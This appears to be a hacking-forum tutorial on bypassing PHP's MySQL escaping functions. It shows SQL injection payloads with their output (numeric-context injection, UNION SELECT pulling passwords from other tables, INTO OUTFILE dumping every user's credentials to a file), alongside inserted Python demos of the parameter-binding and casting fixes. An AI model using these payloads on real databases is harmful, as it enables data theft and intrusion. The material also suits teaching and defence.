Hello Guys

I found a new tutorial on the internet to bypass mysql_escape_string. Here it is.

In general, the signature is string mysql_escape_string(string $unescaped_string). This function escapes the unescaped_string so that it is safe to place in a mysql_query().

First of all, mysql_escape_string() does not take a connection argument and does not respect the current charset setting; it suffers from the same flaw as addslashes() and can be exploited in the same manner.

mysql_escape_string() does not escape % and _.
One manifestation of an exploit here is injection into the LIKE clause of a query: a user-supplied search term of % or _ is still a wildcard after escaping.
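To make the LIKE point concrete, here is an added example that is not part of the original post. It uses Python's sqlite3 as an offline stand-in for MySQL (an assumption; the table and usernames are constructed), mimics what the mysql_*_escape_string() functions do to quotes, and then shows the difference between splicing an escaped term into a LIKE pattern and binding a properly wildcard-escaped pattern as a parameter.

```python
import sqlite3

# Constructed sample data, loosely mirroring the users table in the post.
USERNAMES = ["acidburn", "zerocool", "lordnikon", "cerealkiller"]


def make_db():
    """In-memory sqlite3 database standing in for MySQL (assumption for the demo)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", list(enumerate(USERNAMES, 1)))
    return conn


def escape_string(s):
    """Mimics the quote escaping of mysql_escape_string(): backslash-escapes NUL,
    newline, carriage return, backslash, ' and ". Note that % and _ pass through."""
    table = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\", "'": "\\'", '"': '\\"'}
    return "".join(table.get(c, c) for c in s)


def search_naive(conn, term):
    """The weak pattern: the term is quote-escaped and spliced into a LIKE pattern.
    A term of '%' or '_' is still a wildcard, so it matches every row."""
    sql = "SELECT username FROM users WHERE username LIKE '%" + escape_string(term) + "%' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def escape_like(term, esc="\\"):
    """Escape the LIKE metacharacters (and the escape character itself) so the
    user's text can only match itself literally."""
    return term.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def search_safe(conn, term):
    """The hardened pattern: wildcard-escape the term, bind the whole pattern as a
    parameter, and tell the database which escape character was used."""
    pattern = "%" + escape_like(term) + "%"
    sql = "SELECT username FROM users WHERE username LIKE ? ESCAPE '\\' ORDER BY id"
    return [row[0] for row in conn.execute(sql, (pattern,))]


if __name__ == "__main__":
    db = make_db()
    print("naive, term '%':", search_naive(db, "%"))   # every username leaks out
    print("safe,  term '%':", search_safe(db, "%"))    # nothing contains a literal '%'
    print("safe,  term 'acid':", search_safe(db, "acid"))
```

The parameter binding on its own would not have been enough here: a bound `%` is still a wildcard to LIKE. The fix is the combination of escaping the metacharacters, declaring the escape character with ESCAPE, and binding the result rather than concatenating it.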

According to the manual, string mysql_real_escape_string(string $unescaped_string [, resource $link_identifier])
escapes special characters in the unescaped_string, taking into account the current character set of the connection, so that it is safe to place it in a mysql_query(). This function must always be used (with few exceptions) to make data safe before sending a query to MySQL.

In reality, mysql_real_escape_string() is there to escape strings and prevent SQL injection on string variables.

Again,

In reality, mysql_real_escape_string() is used to escape strings and prevent SQL injection on string variables.

Note the keywords.

Numeric variables are not protected and can be exploited for SQL injection even when passed through mysql_real_escape_string(), because the escaping only neutralizes quote characters and a numeric comparison contains no quotes.

i.e.

' -> \'

don't -> don\'t

1 OR 1=1 -> 1 OR 1=1

NOW Actual Exploitation:

Suppose we have this table.

mysql> SELECT * FROM users;
Code:
+----+--------------+-----------+---------------+
| id | username     | password  | email         |
+----+--------------+-----------+---------------+
|  1 | acidburn     | 3rdegre3  | ab@yahoo.com  |
|  2 | zerocool     | 0kewl     | zc@yahoo.com  |
|  3 | lordnikon    | c4mera    | ln@yahoo.com  |
|  4 | cerealkiller | fr00tl00p | ck@yahoo.com  |
+----+--------------+-----------+---------------+
4 rows in set (0.00 sec)

And this table.

mysql> SELECT * FROM notes;
Code:
+----+---------+--------------------------+
| id | user_id | content                  |
+----+---------+--------------------------+
|  1 |       2 | i hate acid burn         |
|  2 |       3 | two words: davinci virus |
|  3 |       1 | i hate crash override    |
|  4 |       4 | am i on bsd or lsd?      |
+----+---------+--------------------------+
4 rows in set (0.00 sec)

And this query with "protection".
Code:
// The "protected" query from the tutorial: the value is escaped, then concatenated
// straight into a numeric comparison. There are no quotes for the escaping to defend.
$query = "SELECT * FROM users WHERE id = " . mysql_real_escape_string($user_id);
Exploiting an integer variable.

mysql> SELECT * FROM users WHERE id = 1;
Code:
+----+----------+----------+--------------+
| id | username | password | email        |
+----+----------+----------+--------------+
|  1 | acidburn | 3rdegre3 | ab@yahoo.com |
+----+----------+----------+--------------+
1 row in set (0.00 sec)

GOOD

Worthless:
Code:
// Same "protected" query, now with an attacker-controlled $user_id. Nothing in the
// input is a quote or backslash, so mysql_real_escape_string() returns it unchanged.
$query = "SELECT * FROM users WHERE id = " . mysql_real_escape_string("1 UNION SELECT id, user_id, content, NULL FROM notes WHERE user_id = 1");
The query returns

mysql> SELECT * FROM users WHERE id = 1 UNION SELECT id, user_id, content, NULL FROM notes WHERE user_id = 1;
Code:
+----+----------+-----------------------+--------------+
| id | username | password              | email        |
+----+----------+-----------------------+--------------+
|  1 | acidburn | 3rdegre3              | ab@yahoo.com |
|  3 | 1        | i hate crash override | NULL         |
+----+----------+-----------------------+--------------+
2 rows in set (0.00 sec)

BAD

UNION can help pull more data than what the original query would allow. In the previous example, we retrieved data from a separate table. We can also get more data from the same table.

mysql> SELECT id, username FROM users WHERE id = 1;
Code:
+----+----------+
| id | username |
+----+----------+
|  1 | acidburn |
+----+----------+
1 row in set (0.00 sec)

GOOD

And the exploited query would be:

mysql> SELECT id, username FROM users WHERE id = 1 UNION SELECT password, email FROM users WHERE id = 1;
Code:
+----------+--------------+
| id       | username     |
+----------+--------------+
| 1        | acidburn     |
| 3rdegre3 | ab@yahoo.com |
+----------+--------------+
2 rows in set (0.00 sec)

BAD
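The numeric-context problem from the "Note the keywords" section and both UNION examples above come down to the same defect, so here is one added example (not code from the original post) covering all of them. It uses Python's sqlite3 as an offline stand-in for MySQL (an assumption), rebuilds the two tables with constructed rows matching the post, mimics mysql_real_escape_string() with a small escape_string() helper, and then puts the escape-and-concatenate lookup beside the two fixes a defender would actually ship: casting the value to an integer before it reaches the query text, and binding it as a query parameter.

```python
import sqlite3

# Constructed sample rows mirroring the post's users and notes tables.
USERS = [
    (1, "acidburn", "3rdegre3", "ab@yahoo.com"),
    (2, "zerocool", "0kewl", "zc@yahoo.com"),
    (3, "lordnikon", "c4mera", "ln@yahoo.com"),
    (4, "cerealkiller", "fr00tl00p", "ck@yahoo.com"),
]
NOTES = [
    (1, 2, "i hate acid burn"),
    (2, 3, "two words: davinci virus"),
    (3, 1, "i hate crash override"),
    (4, 4, "am i on bsd or lsd?"),
]


def make_db():
    """In-memory sqlite3 database standing in for MySQL (assumption for the demo)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, email TEXT)")
    conn.execute("CREATE TABLE notes (id INTEGER, user_id INTEGER, content TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    conn.executemany("INSERT INTO notes VALUES (?, ?, ?)", NOTES)
    return conn


def escape_string(s):
    """Mimics mysql_real_escape_string(): backslash-escapes NUL, newline, carriage
    return, backslash, ' and ". Digits, spaces and SQL keywords pass through untouched."""
    table = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\", "'": "\\'", '"': '\\"'}
    return "".join(table.get(c, c) for c in s)


def lookup_escaped(conn, user_id):
    """The post's 'protected' query: escaped, then concatenated into a numeric
    comparison. With no quotes around the value, escaping changes nothing."""
    sql = "SELECT id, username FROM users WHERE id = " + escape_string(str(user_id))
    return conn.execute(sql).fetchall()


def lookup_cast(conn, user_id):
    """Fix 1: coerce to the expected numeric type before building the query.
    Anything that is not an integer is rejected rather than interpreted as SQL."""
    try:
        n = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("user_id must be an integer")
    return conn.execute(f"SELECT id, username FROM users WHERE id = {n}").fetchall()


def lookup_param(conn, user_id):
    """Fix 2: a parameterized query. The driver binds the value; it is never part
    of the SQL text, so there is nothing for escaping to get wrong."""
    return conn.execute("SELECT id, username FROM users WHERE id = ?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    hostile = "1 OR 1=1"   # the post's example input; it contains no quote characters
    print("escaped :", lookup_escaped(db, hostile))   # four rows: the WHERE clause is now always true
    print("param   :", lookup_param(db, hostile))     # no rows: the text is compared as a value
    print("cast    :", lookup_cast(db, 1))            # the one intended row
```

Of the two fixes, parameter binding is the general one: it works for strings and numbers alike and removes the need to remember which contexts escaping protects. Casting is still worth doing in addition, because it also rejects malformed ids at the edge of the application, where the error is easy to report.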

File I/O is important functionality for MySQL, especially for data import and export. SQL injection can abuse this functionality to widen the attack surface: a query result can be written straight to a file on the database host.

Consider this situation…
Want: Dump of users and notes.
Given: Application with arbitrary file disclosure and SQL injection (no protection).
Caveat: Application code only operates on first row of resultset (will not return full resultset).
Code:
SELECT    *
FROM    users
WHERE    id = 1 OR 1=1 UNION SELECT id, user_id, content, 0 FROM notes INTO OUTFILE '/tmp/users_notes.txt';
WIN

$ cat /tmp/users_notes.txt
Code:
1       acidburn        3rdegre3        ab@yahoo.com
2       zerocool        0kewl   zc@yahoo.com
3       lordnikon       c4mera  ln@yahoo.com
4       cerealkiller    fr00tl00p       ck@yahoo.com
1       2       i hate acid burn        0
2       3       two words: davinci virus        0
3       1       i hate crash override   0
4       4       am i on bsd or lsd?     0
Oh look!!! It's damn easy!!!!!